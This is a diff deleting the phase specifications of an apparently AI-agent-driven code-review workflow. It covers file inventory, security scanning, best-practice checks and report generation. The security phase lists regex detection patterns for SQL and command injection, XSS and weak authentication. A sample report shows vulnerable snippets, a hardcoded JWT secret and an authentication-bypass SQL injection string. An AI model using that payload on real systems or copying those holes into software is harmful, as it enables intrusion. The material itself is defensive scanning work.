action: "find_files",
|
||||
pattern: scope,
|
||||
includeHidden: false
|
||||
});
|
||||
|
||||
// Apply exclusion patterns
|
||||
const filteredFiles = files.filter(file => {
|
||||
return !exclude.some(pattern => minimatch(file, pattern));
|
||||
});
|
||||
```
|
||||
|
||||
### Step 3: Categorize Files
|
||||
|
||||
Categorize files by:
|
||||
- **Language/Framework**: TypeScript, Python, Java, Go, etc.
|
||||
- **File Type**: Source, config, test, build
|
||||
- **Priority**: Critical (auth, payment), High (API), Medium (utils), Low (docs)
|
||||
|
||||
```javascript
|
||||
const inventory = {
|
||||
critical: {
|
||||
auth: ['src/auth/login.ts', 'src/auth/jwt.ts'],
|
||||
payment: ['src/payment/stripe.ts'],
|
||||
},
|
||||
high: {
|
||||
api: ['src/api/users.ts', 'src/api/orders.ts'],
|
||||
database: ['src/db/queries.ts'],
|
||||
},
|
||||
medium: {
|
||||
utils: ['src/utils/validator.ts'],
|
||||
services: ['src/services/*.ts'],
|
||||
},
|
||||
low: {
|
||||
types: ['src/types/*.ts'],
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
### Step 4: Extract Metadata
|
||||
|
||||
For each file, extract:
|
||||
- **Lines of Code (LOC)**
|
||||
- **Complexity Indicators**: Function count, class count
|
||||
- **Dependencies**: Import statements
|
||||
- **Framework Detection**: Express, React, Django, etc.
|
||||
|
||||
```javascript
|
||||
const metadata = files.map(file => ({
|
||||
path: file,
|
||||
language: detectLanguage(file),
|
||||
loc: countLines(file),
|
||||
complexity: estimateComplexity(file),
|
||||
framework: detectFramework(file),
|
||||
priority: categorizePriority(file)
|
||||
}));
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
### File Inventory
|
||||
|
||||
Save to `.code-review/inventory.json`:
|
||||
|
||||
```json
|
||||
{
|
||||
"scan_date": "2024-01-15T10:30:00Z",
|
||||
"total_files": 247,
|
||||
"by_language": {
|
||||
"typescript": 185,
|
||||
"python": 42,
|
||||
"javascript": 15,
|
||||
"go": 5
|
||||
},
|
||||
"by_priority": {
|
||||
"critical": 12,
|
||||
"high": 45,
|
||||
"medium": 120,
|
||||
"low": 70
|
||||
},
|
||||
"files": [
|
||||
{
|
||||
"path": "src/auth/login.ts",
|
||||
"language": "typescript",
|
||||
"loc": 245,
|
||||
"functions": 8,
|
||||
"classes": 2,
|
||||
"priority": "critical",
|
||||
"framework": "express",
|
||||
"dependencies": ["bcrypt", "jsonwebtoken", "express"]
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
### Summary Report
|
||||
|
||||
```markdown
|
||||
## Code Discovery Summary
|
||||
|
||||
**Scope**: src/**/*
|
||||
**Total Files**: 247
|
||||
**Languages**: TypeScript (75%), Python (17%), JavaScript (6%), Go (2%)
|
||||
|
||||
### Priority Distribution
|
||||
- Critical: 12 files (authentication, payment processing)
|
||||
- High: 45 files (API endpoints, database queries)
|
||||
- Medium: 120 files (utilities, services)
|
||||
- Low: 70 files (types, configs)
|
||||
|
||||
### Key Areas Identified
|
||||
1. **Authentication Module** (src/auth/) - 12 files, 2,400 LOC
|
||||
2. **Payment Processing** (src/payment/) - 5 files, 1,200 LOC
|
||||
3. **API Layer** (src/api/) - 35 files, 5,600 LOC
|
||||
4. **Database Layer** (src/db/) - 8 files, 1,800 LOC
|
||||
|
||||
**Next Phase**: Security Analysis on Critical + High priority files
|
||||
```
|
||||
|
||||
## State Management
|
||||
|
||||
Save phase state for potential resume:
|
||||
|
||||
```json
|
||||
{
|
||||
"phase": "01-code-discovery",
|
||||
"status": "completed",
|
||||
"timestamp": "2024-01-15T10:35:00Z",
|
||||
"output": {
|
||||
"inventory_path": ".code-review/inventory.json",
|
||||
"total_files": 247,
|
||||
"critical_files": 12,
|
||||
"high_files": 45
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Agent Instructions
|
||||
|
||||
```markdown
|
||||
You are in Phase 1 of the Code Review workflow. Your task is to discover and categorize code files.
|
||||
|
||||
**Instructions**:
|
||||
1. Use mcp__ccw_tools__smart_search with action="find_files" to discover files
|
||||
2. Apply exclusion patterns from config or arguments
|
||||
3. Categorize files by language, type, and priority
|
||||
4. Extract basic metadata (LOC, complexity indicators)
|
||||
5. Save inventory to .code-review/inventory.json
|
||||
6. Generate summary report
|
||||
7. Proceed to Phase 2 with critical + high priority files
|
||||
|
||||
**Tools Available**:
|
||||
- mcp__ccw_tools__smart_search (file discovery)
|
||||
- Read (read configuration and sample files)
|
||||
- Write (save inventory and reports)
|
||||
|
||||
**Output Requirements**:
|
||||
- inventory.json with complete file list and metadata
|
||||
- Summary markdown report
|
||||
- State file for phase tracking
|
||||
```
|
||||
|
||||
## Error Handling
|
||||
|
||||
### No Files Found
|
||||
|
||||
```javascript
|
||||
if (filteredFiles.length === 0) {
|
||||
throw new Error(`No files found matching scope: ${scope}
|
||||
|
||||
Suggestions:
|
||||
- Check if scope pattern is correct
|
||||
- Verify exclude patterns are not too broad
|
||||
- Ensure project has code files in specified scope
|
||||
`);
|
||||
}
|
||||
```
|
||||
|
||||
### Large Codebase
|
||||
|
||||
```javascript
|
||||
if (filteredFiles.length > 1000) {
|
||||
console.warn(`⚠️ Large codebase detected (${filteredFiles.length} files)`);
|
||||
console.log(`Consider using --scope to review in batches`);
|
||||
|
||||
// Offer to focus on critical/high priority only
|
||||
const answer = await askUser("Review critical/high priority files only?");
|
||||
if (answer === 'yes') {
|
||||
filteredFiles = filteredFiles.filter(f =>
|
||||
f.priority === 'critical' || f.priority === 'high'
|
||||
);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Validation
|
||||
|
||||
Before proceeding to Phase 2:
|
||||
|
||||
- ✅ Inventory file created
|
||||
- ✅ At least one file categorized as critical or high priority
|
||||
- ✅ Metadata extracted for all files
|
||||
- ✅ Summary report generated
|
||||
- ✅ State saved for resume capability
|
||||
|
||||
## Next Phase
|
||||
|
||||
**Phase 2: Security Analysis** - Analyze critical and high priority files for security vulnerabilities using OWASP Top 10 and CWE Top 25 checks.
|
||||
@@ -1,442 +0,0 @@
|
||||
# Phase 2: Security Analysis
|
||||
|
||||
## Objective
|
||||
|
||||
Analyze code files for security vulnerabilities based on OWASP Top 10, CWE Top 25, and language-specific security patterns.
|
||||
|
||||
## Input
|
||||
|
||||
- **File Inventory**: From Phase 1 (`.code-review/inventory.json`)
|
||||
- **Priority Focus**: Critical and High priority files (unless `--scope all`)
|
||||
- **User Arguments**:
|
||||
- `--focus security`: Security-only mode
|
||||
- `--severity critical,high,medium,low`: Minimum severity to report
|
||||
- `--checks`: Specific security checks to run (e.g., sql-injection, xss)
|
||||
|
||||
## Process
|
||||
|
||||
### Step 1: Load Security Rules
|
||||
|
||||
```javascript
|
||||
// Load security check definitions
|
||||
const securityRules = {
|
||||
owasp_top_10: [
|
||||
'injection',
|
||||
'broken_authentication',
|
||||
'sensitive_data_exposure',
|
||||
'xxe',
|
||||
'broken_access_control',
|
||||
'security_misconfiguration',
|
||||
'xss',
|
||||
'insecure_deserialization',
|
||||
'vulnerable_components',
|
||||
'insufficient_logging'
|
||||
],
|
||||
cwe_top_25: [
|
||||
'cwe-79', // XSS
|
||||
'cwe-89', // SQL Injection
|
||||
'cwe-20', // Improper Input Validation
|
||||
'cwe-78', // OS Command Injection
|
||||
'cwe-190', // Integer Overflow
|
||||
// ... more CWE checks
|
||||
]
|
||||
};
|
||||
|
||||
// Load language-specific rules
|
||||
const languageRules = {
|
||||
typescript: require('./rules/typescript-security.json'),
|
||||
python: require('./rules/python-security.json'),
|
||||
java: require('./rules/java-security.json'),
|
||||
go: require('./rules/go-security.json'),
|
||||
};
|
||||
```
|
||||
|
||||
### Step 2: Analyze Files for Vulnerabilities
|
||||
|
||||
For each file in the inventory, perform security analysis:
|
||||
|
||||
```javascript
|
||||
const findings = [];
|
||||
|
||||
for (const file of inventory.files) {
|
||||
if (file.priority !== 'critical' && file.priority !== 'high') continue;
|
||||
|
||||
// Read file content
|
||||
const content = await Read({ file_path: file.path });
|
||||
|
||||
// Run security checks
|
||||
const fileFindings = await runSecurityChecks(content, file, {
|
||||
rules: securityRules,
|
||||
languageRules: languageRules[file.language],
|
||||
severity: args.severity || 'medium'
|
||||
});
|
||||
|
||||
findings.push(...fileFindings);
|
||||
}
|
||||
```
|
||||
|
||||
### Step 3: Security Check Patterns
|
||||
|
||||
#### A. Injection Vulnerabilities
|
||||
|
||||
**SQL Injection**:
|
||||
```javascript
|
||||
// Pattern: String concatenation in SQL queries
|
||||
const sqlInjectionPatterns = [
|
||||
/\$\{.*\}.*SELECT/, // Template literal with SELECT
|
||||
/"SELECT.*\+\s*\w+/, // String concatenation
|
||||
/execute\([`'"].*\$\{.*\}.*[`'"]\)/, // Parameterized query bypass
|
||||
/query\(.*\+.*\)/, // Query concatenation
|
||||
];
|
||||
|
||||
// Check code
|
||||
for (const pattern of sqlInjectionPatterns) {
|
||||
const matches = content.matchAll(new RegExp(pattern, 'g'));
|
||||
for (const match of matches) {
|
||||
findings.push({
|
||||
type: 'sql-injection',
|
||||
severity: 'critical',
|
||||
line: getLineNumber(content, match.index),
|
||||
code: match[0],
|
||||
file: file.path,
|
||||
message: 'Potential SQL injection vulnerability',
|
||||
recommendation: 'Use parameterized queries or ORM methods',
|
||||
cwe: 'CWE-89',
|
||||
owasp: 'A03:2021 - Injection'
|
||||
});
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**Command Injection**:
|
||||
```javascript
|
||||
// Pattern: Unsanitized input in exec/spawn
|
||||
const commandInjectionPatterns = [
|
||||
/exec\(.*\$\{.*\}/, // exec with template literal
|
||||
/spawn\(.*,\s*\[.*\$\{.*\}.*\]\)/, // spawn with unsanitized args
|
||||
/execSync\(.*\+.*\)/, // execSync with concatenation
|
||||
];
|
||||
```
|
||||
|
||||
**XSS (Cross-Site Scripting)**:
|
||||
```javascript
|
||||
// Pattern: Unsanitized user input in DOM/HTML
|
||||
const xssPatterns = [
|
||||
/innerHTML\s*=.*\$\{.*\}/, // innerHTML with template literal
|
||||
/dangerouslySetInnerHTML/, // React dangerous prop
|
||||
/document\.write\(.*\)/, // document.write
|
||||
/<\w+.*\$\{.*\}.*>/, // JSX with unsanitized data
|
||||
];
|
||||
```
|
||||
|
||||
#### B. Authentication & Authorization
|
||||
|
||||
```javascript
|
||||
// Pattern: Weak authentication
|
||||
const authPatterns = [
|
||||
/password\s*===?\s*['"]/, // Hardcoded password comparison
|
||||
/jwt\.sign\(.*,\s*['"][^'"]{1,16}['"]\)/, // Weak JWT secret
|
||||
/bcrypt\.hash\(.*,\s*[1-9]\s*\)/, // Low bcrypt rounds
|
||||
/md5\(.*password.*\)/, // MD5 for passwords
|
||||
/if\s*\(\s*user\s*\)\s*\{/, // Missing auth check
|
||||
];
|
||||
|
||||
// Check for missing authorization
|
||||
const authzPatterns = [
|
||||
/router\.(get|post|put|delete)\(.*\)\s*=>/, // No middleware
|
||||
/app\.use\([^)]*\)\s*;(?!.*auth)/, // Missing auth middleware
|
||||
];
|
||||
```
|
||||
|
||||
#### C. Sensitive Data Exposure
|
||||
|
||||
```javascript
|
||||
// Pattern: Sensitive data in logs/responses
|
||||
const sensitiveDataPatterns = [
|
||||
/(password|secret|token|key)\s*:/i, // Sensitive keys in objects
|
||||
/console\.log\(.*password.*\)/i, // Password in logs
|
||||
/res\.send\(.*user.*password.*\)/, // Password in response
|
||||
/(api_key|apikey)\s*=\s*['"]/i, // Hardcoded API keys
|
||||
];
|
||||
```
|
||||
|
||||
#### D. Security Misconfiguration
|
||||
|
||||
```javascript
|
||||
// Pattern: Insecure configurations
|
||||
const misconfigPatterns = [
|
||||
/cors\(\{.*origin:\s*['"]?\*['"]?.*\}\)/, // CORS wildcard
|
||||
/https?\s*:\s*false/, // HTTPS disabled
|
||||
/helmet\(\)/, // Missing helmet config
|
||||
/strictMode\s*:\s*false/, // Strict mode disabled
|
||||
];
|
||||
```
|
||||
|
||||
### Step 4: Language-Specific Checks
|
||||
|
||||
**TypeScript/JavaScript**:
|
||||
```javascript
|
||||
const jsFindings = [
|
||||
checkPrototypePollution(content),
|
||||
checkEvalUsage(content),
|
||||
checkUnsafeRegex(content),
|
||||
checkWeakCrypto(content),
|
||||
];
|
||||
```
|
||||
|
||||
**Python**:
|
||||
```javascript
|
||||
const pythonFindings = [
|
||||
checkPickleVulnerabilities(content),
|
||||
checkYamlUnsafeLoad(content),
|
||||
checkSqlAlchemy(content),
|
||||
checkFlaskSecurityHeaders(content),
|
||||
];
|
||||
```
|
||||
|
||||
**Java**:
|
||||
```javascript
|
||||
const javaFindings = [
|
||||
checkDeserialization(content),
|
||||
checkXXE(content),
|
||||
checkPathTraversal(content),
|
||||
checkSQLInjection(content),
|
||||
];
|
||||
```
|
||||
|
||||
**Go**:
|
||||
```javascript
|
||||
const goFindings = [
|
||||
checkRaceConditions(content),
|
||||
checkSQLInjection(content),
|
||||
checkPathTraversal(content),
|
||||
checkCryptoWeakness(content),
|
||||
];
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
### Security Findings File
|
||||
|
||||
Save to `.code-review/security-findings.json`:
|
||||
|
||||
```json
|
||||
{
|
||||
"scan_date": "2024-01-15T11:00:00Z",
|
||||
"total_findings": 24,
|
||||
"by_severity": {
|
||||
"critical": 3,
|
||||
"high": 8,
|
||||
"medium": 10,
|
||||
"low": 3
|
||||
},
|
||||
"by_category": {
|
||||
"injection": 5,
|
||||
"authentication": 3,
|
||||
"data_exposure": 4,
|
||||
"misconfiguration": 6,
|
||||
"xss": 3,
|
||||
"other": 3
|
||||
},
|
||||
"findings": [
|
||||
{
|
||||
"id": "SEC-001",
|
||||
"type": "sql-injection",
|
||||
"severity": "critical",
|
||||
"file": "src/auth/user-service.ts",
|
||||
"line": 145,
|
||||
"column": 12,
|
||||
"code": "const query = `SELECT * FROM users WHERE username = '${username}'`;",
|
||||
"message": "SQL Injection vulnerability: User input directly concatenated in SQL query",
|
||||
"cwe": "CWE-89",
|
||||
"owasp": "A03:2021 - Injection",
|
||||
"recommendation": {
|
||||
"description": "Use parameterized queries to prevent SQL injection",
|
||||
"fix_example": "const query = 'SELECT * FROM users WHERE username = ?';\ndb.execute(query, [username]);"
|
||||
},
|
||||
"references": [
|
||||
"https://owasp.org/www-community/attacks/SQL_Injection",
|
||||
"https://cwe.mitre.org/data/definitions/89.html"
|
||||
]
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
### Security Report
|
||||
|
||||
Generate markdown report:
|
||||
|
||||
```markdown
|
||||
# Security Analysis Report
|
||||
|
||||
**Scan Date**: 2024-01-15 11:00:00
|
||||
**Files Analyzed**: 57 (Critical + High priority)
|
||||
**Total Findings**: 24
|
||||
|
||||
## Severity Summary
|
||||
|
||||
| Severity | Count | Percentage |
|
||||
|----------|-------|------------|
|
||||
| Critical | 3 | 12.5% |
|
||||
| High | 8 | 33.3% |
|
||||
| Medium | 10 | 41.7% |
|
||||
| Low | 3 | 12.5% |
|
||||
|
||||
## Critical Findings (Requires Immediate Action)
|
||||
|
||||
### 🔴 [SEC-001] SQL Injection in User Authentication
|
||||
|
||||
**File**: `src/auth/user-service.ts:145`
|
||||
**CWE**: CWE-89 | **OWASP**: A03:2021 - Injection
|
||||
|
||||
**Vulnerable Code**:
|
||||
\`\`\`typescript
|
||||
const query = \`SELECT * FROM users WHERE username = '\${username}'\`;
|
||||
const user = await db.execute(query);
|
||||
\`\`\`
|
||||
|
||||
**Issue**: User input (`username`) is directly concatenated into SQL query, allowing attackers to inject malicious SQL commands.
|
||||
|
||||
**Attack Example**:
|
||||
\`\`\`
|
||||
username: ' OR '1'='1' --
|
||||
Result: SELECT * FROM users WHERE username = '' OR '1'='1' --'
|
||||
Effect: Bypasses authentication, returns all users
|
||||
\`\`\`
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`typescript
|
||||
// Use parameterized queries
|
||||
const query = 'SELECT * FROM users WHERE username = ?';
|
||||
const user = await db.execute(query, [username]);
|
||||
|
||||
// Or use ORM
|
||||
const user = await User.findOne({ where: { username } });
|
||||
\`\`\`
|
||||
|
||||
**References**:
|
||||
- [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
|
||||
- [CWE-89](https://cwe.mitre.org/data/definitions/89.html)
|
||||
|
||||
---
|
||||
|
||||
### 🔴 [SEC-002] Hardcoded JWT Secret
|
||||
|
||||
**File**: `src/auth/jwt.ts:23`
|
||||
**CWE**: CWE-798 | **OWASP**: A07:2021 - Identification and Authentication Failures
|
||||
|
||||
**Vulnerable Code**:
|
||||
\`\`\`typescript
|
||||
const token = jwt.sign(payload, 'mysecret123', { expiresIn: '1h' });
|
||||
\`\`\`
|
||||
|
||||
**Issue**: JWT secret is hardcoded and weak (only 11 characters).
|
||||
|
||||
**Recommended Fix**:
|
||||
\`\`\`typescript
|
||||
// Use environment variable with strong secret
|
||||
const token = jwt.sign(payload, process.env.JWT_SECRET, {
|
||||
expiresIn: '1h',
|
||||
algorithm: 'HS256'
|
||||
});
|
||||
|
||||
// Generate strong secret (32+ bytes):
|
||||
// node -e "console.log(require('crypto').randomBytes(32).toString('hex'))"
|
||||
\`\`\`
|
||||
|
||||
---
|
||||
|
||||
## High Findings
|
||||
|
||||
### 🟠 [SEC-003] Missing Input Validation
|
||||
|
||||
**File**: `src/api/users.ts:67`
|
||||
**CWE**: CWE-20 | **OWASP**: A03:2021 - Injection
|
||||
|
||||
...
|
||||
|
||||
## Medium Findings
|
||||
|
||||
...
|
||||
|
||||
## Remediation Priority
|
||||
|
||||
1. **Critical (3)**: Fix within 24 hours
|
||||
2. **High (8)**: Fix within 1 week
|
||||
3. **Medium (10)**: Fix within 1 month
|
||||
4. **Low (3)**: Fix in next release
|
||||
|
||||
## Compliance Impact
|
||||
|
||||
- **PCI DSS**: 4 findings affect compliance (SEC-001, SEC-002, SEC-008, SEC-011)
|
||||
- **HIPAA**: 2 findings affect compliance (SEC-005, SEC-009)
|
||||
- **GDPR**: 3 findings affect compliance (SEC-002, SEC-005, SEC-007)
|
||||
```
|
||||
|
||||
## State Management
|
||||
|
||||
```json
|
||||
{
|
||||
"phase": "02-security-analysis",
|
||||
"status": "completed",
|
||||
"timestamp": "2024-01-15T11:15:00Z",
|
||||
"input": {
|
||||
"inventory_path": ".code-review/inventory.json",
|
||||
"files_analyzed": 57
|
||||
},
|
||||
"output": {
|
||||
"findings_path": ".code-review/security-findings.json",
|
||||
"total_findings": 24,
|
||||
"critical_count": 3,
|
||||
"high_count": 8
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Agent Instructions
|
||||
|
||||
```markdown
|
||||
You are in Phase 2 of the Code Review workflow. Your task is to analyze code for security vulnerabilities.
|
||||
|
||||
**Instructions**:
|
||||
1. Load file inventory from Phase 1
|
||||
2. Focus on Critical + High priority files
|
||||
3. Run security checks for:
|
||||
- OWASP Top 10 vulnerabilities
|
||||
- CWE Top 25 weaknesses
|
||||
- Language-specific security patterns
|
||||
4. Use smart_search with mode="ripgrep" for pattern matching
|
||||
5. Use mcp__ace-tool__search_context for semantic security pattern discovery
|
||||
6. Classify findings by severity (Critical/High/Medium/Low)
|
||||
7. Generate security-findings.json and markdown report
|
||||
8. Proceed to Phase 3 (Best Practices Review)
|
||||
|
||||
**Tools Available**:
|
||||
- mcp__ccw_tools__smart_search (pattern search)
|
||||
- mcp__ace-tool__search_context (semantic search)
|
||||
- Read (read file content)
|
||||
- Write (save findings and reports)
|
||||
- Grep (targeted pattern matching)
|
||||
|
||||
**Output Requirements**:
|
||||
- security-findings.json with detailed findings
|
||||
- Security report in markdown format
|
||||
- Each finding must include: file, line, severity, CWE, OWASP, fix recommendation
|
||||
- State file for phase tracking
|
||||
```
|
||||
|
||||
## Validation
|
||||
|
||||
Before proceeding to Phase 3:
|
||||
|
||||
- ✅ All Critical + High priority files analyzed
|
||||
- ✅ Findings categorized by severity
|
||||
- ✅ Each finding has fix recommendation
|
||||
- ✅ CWE and OWASP mappings included
|
||||
- ✅ Security report generated
|
||||
- ✅ State saved
|
||||
|
||||
## Next Phase
|
||||
|
||||
**Phase 3: Best Practices Review** - Analyze code quality, performance, and maintainability issues.
|
||||
@@ -1,36 +0,0 @@
|
||||
# Phase 3: Best Practices Review
|
||||
|
||||
## Objective
|
||||
|
||||
Analyze code for best practices violations including code quality, performance issues, and maintainability concerns.
|
||||
|
||||
## Input
|
||||
|
||||
- **File Inventory**: From Phase 1 (`.code-review/inventory.json`)
|
||||
- **Security Findings**: From Phase 2 (`.code-review/security-findings.json`)
|
||||
- **User Arguments**:
|
||||
- `--focus best-practices`: Best practices only mode
|
||||
- `--check quality,performance,maintainability`: Specific areas to check
|
||||
|
||||
## Process
|
||||
|
||||
### Step 1: Code Quality Analysis
|
||||
|
||||
Check naming conventions, function complexity, code duplication, and dead code detection.
|
||||
|
||||
### Step 2: Performance Analysis
|
||||
|
||||
Detect N+1 queries, inefficient algorithms, and memory leaks.
|
||||
|
||||
### Step 3: Maintainability Analysis
|
||||
|
||||
Check documentation coverage, test coverage, and dependency management.
|
||||
|
||||
## Output
|
||||
|
||||
- best-practices-findings.json
|
||||
- Markdown report with recommendations
|
||||
|
||||
## Next Phase
|
||||
|
||||
**Phase 4: Report Generation**
|
||||
@@ -1,278 +0,0 @@
|
||||
# Phase 4: Report Generation
|
||||
|
||||
## Objective
|
||||
|
||||
Consolidate security and best practices findings into a comprehensive, actionable code review report.
|
||||
|
||||
## Input
|
||||
|
||||
- **Security Findings**: `.code-review/security-findings.json`
|
||||
- **Best Practices Findings**: `.code-review/best-practices-findings.json`
|
||||
- **File Inventory**: `.code-review/inventory.json`
|
||||
|
||||
## Process
|
||||
|
||||
### Step 1: Load All Findings
|
||||
|
||||
```javascript
|
||||
const securityFindings = JSON.parse(
|
||||
await Read({ file_path: '.code-review/security-findings.json' })
|
||||
);
|
||||
const bestPracticesFindings = JSON.parse(
|
||||
await Read({ file_path: '.code-review/best-practices-findings.json' })
|
||||
);
|
||||
const inventory = JSON.parse(
|
||||
await Read({ file_path: '.code-review/inventory.json' })
|
||||
);
|
||||
```
|
||||
|
||||
### Step 2: Aggregate Statistics
|
||||
|
||||
```javascript
|
||||
const stats = {
|
||||
total_files_reviewed: inventory.total_files,
|
||||
total_findings: securityFindings.total_findings + bestPracticesFindings.total_findings,
|
||||
by_severity: {
|
||||
critical: securityFindings.by_severity.critical,
|
||||
high: securityFindings.by_severity.high + bestPracticesFindings.by_severity.high,
|
||||
medium: securityFindings.by_severity.medium + bestPracticesFindings.by_severity.medium,
|
||||
low: securityFindings.by_severity.low + bestPracticesFindings.by_severity.low,
|
||||
},
|
||||
by_category: {
|
||||
security: securityFindings.total_findings,
|
||||
code_quality: bestPracticesFindings.by_category.code_quality,
|
||||
performance: bestPracticesFindings.by_category.performance,
|
||||
maintainability: bestPracticesFindings.by_category.maintainability,
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
### Step 3: Generate Comprehensive Report
|
||||
|
||||
```markdown
|
||||
# Comprehensive Code Review Report
|
||||
|
||||
**Generated**: {timestamp}
|
||||
**Scope**: {scope}
|
||||
**Files Reviewed**: {total_files}
|
||||
**Total Findings**: {total_findings}
|
||||
|
||||
## Executive Summary
|
||||
|
||||
{Provide high-level overview of code health}
|
||||
|
||||
### Risk Assessment
|
||||
|
||||
{Calculate risk score based on findings}
|
||||
|
||||
### Compliance Status
|
||||
|
||||
{Map findings to compliance requirements}
|
||||
|
||||
## Detailed Findings
|
||||
|
||||
{Merge and organize security + best practices findings}
|
||||
|
||||
## Action Plan
|
||||
|
||||
{Prioritized list of fixes with effort estimates}
|
||||
|
||||
## Appendix
|
||||
|
||||
{Technical details, references, configuration}
|
||||
```
|
||||
|
||||
### Step 4: Generate Fix Tracking Checklist
|
||||
|
||||
Create actionable checklist for developers:
|
||||
|
||||
```markdown
|
||||
# Code Review Fix Checklist
|
||||
|
||||
## Critical Issues (Fix Immediately)
|
||||
|
||||
- [ ] [SEC-001] SQL Injection in src/auth/user-service.ts:145
|
||||
- [ ] [SEC-002] Hardcoded JWT Secret in src/auth/jwt.ts:23
|
||||
- [ ] [SEC-003] XSS Vulnerability in src/api/comments.ts:89
|
||||
|
||||
## High Priority Issues (Fix This Week)
|
||||
|
||||
- [ ] [SEC-004] Missing Authorization Check in src/api/admin.ts:34
|
||||
- [ ] [BP-001] N+1 Query Pattern in src/api/orders.ts:45
|
||||
...
|
||||
```
|
||||
|
||||
### Step 5: Generate Metrics Dashboard
|
||||
|
||||
```markdown
|
||||
## Code Health Metrics
|
||||
|
||||
### Security Score: 68/100
|
||||
- Critical Issues: 3 (-30 points)
|
||||
- High Issues: 8 (-2 points each)
|
||||
|
||||
### Code Quality Score: 75/100
|
||||
- High Complexity Functions: 2
|
||||
- Code Duplication: 5%
|
||||
- Dead Code: 3 instances
|
||||
|
||||
### Performance Score: 82/100
|
||||
- N+1 Queries: 3
|
||||
- Inefficient Algorithms: 2
|
||||
|
||||
### Maintainability Score: 70/100
|
||||
- Documentation Coverage: 65%
|
||||
- Test Coverage: 72%
|
||||
- Missing Tests: 5 files
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
### Main Report
|
||||
|
||||
Save to `.code-review/REPORT.md`:
|
||||
|
||||
- Executive summary
|
||||
- Detailed findings (security + best practices)
|
||||
- Action plan with priorities
|
||||
- Metrics and scores
|
||||
- References and compliance mapping
|
||||
|
||||
### Fix Checklist
|
||||
|
||||
Save to `.code-review/FIX-CHECKLIST.md`:
|
||||
|
||||
- Organized by severity
|
||||
- Checkboxes for tracking
|
||||
- File:line references
|
||||
- Effort estimates
|
||||
|
||||
### JSON Summary
|
||||
|
||||
Save to `.code-review/summary.json`:
|
||||
|
||||
```json
|
||||
{
|
||||
"report_date": "2024-01-15T12:00:00Z",
|
||||
"scope": "src/**/*",
|
||||
"statistics": {
|
||||
"total_files": 247,
|
||||
"total_findings": 69,
|
||||
"by_severity": { "critical": 3, "high": 13, "medium": 30, "low": 23 },
|
||||
"by_category": {
|
||||
"security": 24,
|
||||
"code_quality": 18,
|
||||
"performance": 12,
|
||||
"maintainability": 15
|
||||
}
|
||||
},
|
||||
"scores": {
|
||||
"security": 68,
|
||||
"code_quality": 75,
|
||||
"performance": 82,
|
||||
"maintainability": 70,
|
||||
"overall": 74
|
||||
},
|
||||
"risk_level": "MEDIUM",
|
||||
"action_required": true
|
||||
}
|
||||
```
|
||||
|
||||
## Report Template
|
||||
|
||||
Full report includes:
|
||||
|
||||
1. **Executive Summary**
|
||||
- Overall code health
|
||||
- Risk assessment
|
||||
- Key recommendations
|
||||
|
||||
2. **Security Findings** (from Phase 2)
|
||||
- Critical/High/Medium/Low
|
||||
- OWASP/CWE mappings
|
||||
- Fix recommendations with code examples
|
||||
|
||||
3. **Best Practices Findings** (from Phase 3)
|
||||
- Code quality issues
|
||||
- Performance concerns
|
||||
- Maintainability gaps
|
||||
|
||||
4. **Metrics Dashboard**
|
||||
- Security score
|
||||
- Code quality score
|
||||
- Performance score
|
||||
- Maintainability score
|
||||
|
||||
5. **Action Plan**
|
||||
- Immediate actions (critical)
|
||||
- Short-term (1 week)
|
||||
- Medium-term (1 month)
|
||||
- Long-term (3 months)
|
||||
|
||||
6. **Compliance Impact**
|
||||
- PCI DSS findings
|
||||
- HIPAA findings
|
||||
- GDPR findings
|
||||
- SOC 2 findings
|
||||
|
||||
7. **Appendix**
|
||||
- Full findings list
|
||||
- Configuration used
|
||||
- Tools and versions
|
||||
- References
|
||||
|
||||
## State Management
|
||||
|
||||
```json
|
||||
{
|
||||
"phase": "04-report-generation",
|
||||
"status": "completed",
|
||||
"timestamp": "2024-01-15T12:00:00Z",
|
||||
"input": {
|
||||
"security_findings": ".code-review/security-findings.json",
|
||||
"best_practices_findings": ".code-review/best-practices-findings.json"
|
||||
},
|
||||
"output": {
|
||||
"report": ".code-review/REPORT.md",
|
||||
"checklist": ".code-review/FIX-CHECKLIST.md",
|
||||
"summary": ".code-review/summary.json"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Agent Instructions
|
||||
|
||||
```markdown
|
||||
You are in Phase 4 (FINAL) of the Code Review workflow. Generate comprehensive report.
|
||||
|
||||
**Instructions**:
|
||||
1. Load security findings from Phase 2
|
||||
2. Load best practices findings from Phase 3
|
||||
3. Aggregate statistics and calculate scores
|
||||
4. Generate comprehensive markdown report
|
||||
5. Create fix tracking checklist
|
||||
6. Generate JSON summary
|
||||
7. Inform user of completion and output locations
|
||||
|
||||
**Tools Available**:
|
||||
- Read (load findings)
|
||||
- Write (save reports)
|
||||
|
||||
**Output Requirements**:
|
||||
- REPORT.md (comprehensive markdown report)
|
||||
- FIX-CHECKLIST.md (actionable checklist)
|
||||
- summary.json (machine-readable summary)
|
||||
- All files in .code-review/ directory
|
||||
```
|
||||
|
||||
## Validation
|
||||
|
||||
- ✅ All findings consolidated
|
||||
- ✅ Scores calculated
|
||||
- ✅ Action plan generated
|
||||
- ✅ Reports saved to .code-review/
|
||||
- ✅ User notified of completion
|
||||
|
||||
## Completion
|
||||
|
||||
Code review complete! Outputs available in `.code-review/` directory.
|
||||
@@ -1,346 +0,0 @@
|
||||
# Best Practices Requirements Specification
|
||||
|
||||
## Code Quality Standards
|
||||
|
||||
### Naming Conventions
|
||||
|
||||
**TypeScript/JavaScript**:
|
||||
- Classes/Interfaces: PascalCase (`UserService`, `IUserRepository`)
|
||||
- Functions/Methods: camelCase (`getUserById`, `validateEmail`)
|
||||
- Constants: UPPER_SNAKE_CASE (`MAX_RETRY_COUNT`, `API_BASE_URL`)
|
||||
- Private properties: prefix with `_` or `#` (`_cache`, `#secretKey`)
|
||||
|
||||
**Python**:
|
||||
